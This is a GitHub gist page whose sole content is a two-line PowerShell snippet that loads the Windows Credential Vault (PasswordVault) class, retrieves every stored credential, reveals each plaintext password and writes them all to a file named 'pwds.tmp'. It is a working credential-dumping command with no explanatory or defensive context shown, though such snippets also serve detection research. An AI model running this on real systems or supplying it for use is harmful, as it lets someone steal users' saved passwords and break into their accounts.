Skip to content

Instantly share code, notes, and snippets.

@Samirbous
Created September 23, 2022 18:17
Embed
What would you like to do?
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
(new-object Windows.Security.Credentials.PasswordVault).RetrieveAll()|%{$_.RetrievePassword();$_}>"pwds.tmp"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment